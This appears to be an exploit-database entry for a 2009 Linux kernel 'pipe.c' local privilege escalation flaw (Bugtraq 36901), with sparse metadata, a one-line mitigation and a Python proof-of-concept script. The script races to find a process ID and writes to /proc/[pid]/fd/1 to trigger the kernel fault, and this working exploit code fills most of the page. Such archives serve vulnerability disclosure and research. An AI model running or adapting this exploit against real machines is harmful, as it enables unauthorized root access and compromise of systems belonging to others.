Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability

vendor:

N/A

by:

Matthew Bergin

7.2

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2009

Linux Kernel ‘pipe.c’ Local Privilege Escalation Vulnerability

This is a PoC based off the PoC release by Earl Chew (Updated by Brian Peters). It uses a race condition to exploit a vulnerability in the Linux kernel's 'pipe.c' file. The exploit uses a loop to continuously check for an active PID, and then uses the 'echo n > /proc/[pid]/fd/1' command to trigger the fault and run the exploit.

Mitigation:

Apply the latest security patches to the Linux kernel.

Source

Exploit-DB raw data:

# This is a PoC based off the PoC release by Earl Chew (Updated by Brian Peters)
# Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
# PoC by Matthew Bergin
# Bugtraq ID:       36901
#
# E-DB Note: Exploit Update v2 ~ https://github.com/offensive-security/exploitdb/pull/82/files

import os
import time
import random
import subprocess
#infinite loop
i = 0
x = 0
while (i == 0):
        os.system("sleep 1")
        while (x == 0):
                time.sleep(random.random()) #random int 0.0-1.0
                p = subprocess.Popen(["ps -elf | grep 'sleep 1' | grep -v 'grep' | awk '{print $4}'"], stdout=subprocess.PIPE, shell=True)
		result = p.stdout.read()
		pid = result.replace('\n', '').replace('\r', '')
                if (pid == "0"): #need an active pid, race condition applies
                        print "[+] Didnt grab PID, got: " + pid + " -- Retrying..."
                        break
                else:
                        print "[+] PID: " + pid
                        loc = "echo n > /proc/" + pid + "/fd/1"
                        os.system(loc) # triggers the fault, runs via sh